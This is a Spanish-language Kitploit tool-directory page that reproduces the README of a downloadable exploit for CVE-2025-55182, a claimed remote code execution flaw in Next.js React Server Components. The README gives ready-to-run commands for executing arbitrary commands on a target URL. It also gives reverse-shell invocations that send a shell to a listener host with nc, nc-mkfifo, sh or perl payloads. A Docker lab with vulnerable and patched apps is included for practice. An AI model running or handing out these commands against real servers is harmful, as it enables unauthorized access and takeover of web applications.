Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Exploit para CVE-2025-55182 que permite la ejecución remota de código mediante contaminación de prototipos en React Server Components de Next.js, con capacidades de ejecución de comandos y shell inversa. | Kitploit
Herramientas/GitHubGitHub/mr-destroyer/cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de PayloadsLabs y Práctica
GitHub
mr-destroyer/cve-2025-55182

CVE-2025-55182

Exploit para CVE-2025-55182 que permite la ejecución remota de código mediante contaminación de prototipos en React Server Components de Next.js, con capacidades de ejecución de comandos y shell inversa.

Ver Repositorio
13hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE de Next.js React Server Components

Explota la CVE-2025-55182 para ejecución remota de código mediante contaminación de prototipos.

Instalación

uv sync

Uso

Ejecución de comandos

source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Shell inversa

python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Opciones

  • -u, --url: URL/host a comprobar (obligatorio)
  • -c, --cmd: Comando a ejecutar
  • -r, --reverse: Habilita el modo de shell inversa
  • -l, --lhost: Host del listener para la shell inversa
  • -p, --lport: Puerto del listener para la shell inversa
  • -P, --payload: Tipo de payload de shell inversa: nc, nc-mkfifo, sh, perl (por defecto: nc)
  • --timeout: Tiempo de espera de la petición en segundos (por defecto: 10)

Ejemplos

# Execute command
python3 exploit.py -u https://example.com -c "whoami"

# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo

Entorno de laboratorio

El directorio lab/ contiene una configuración Docker completa para probar el exploit.

Configuración

cd lab
docker-compose up -d

Esto iniciará dos servicios:

  • vulnerable: Aplicación Next.js vulnerable en el puerto 3011
  • patched: Aplicación Next.js parcheada en el puerto 3012

Pruebas

# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"

# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
Descargar herramienta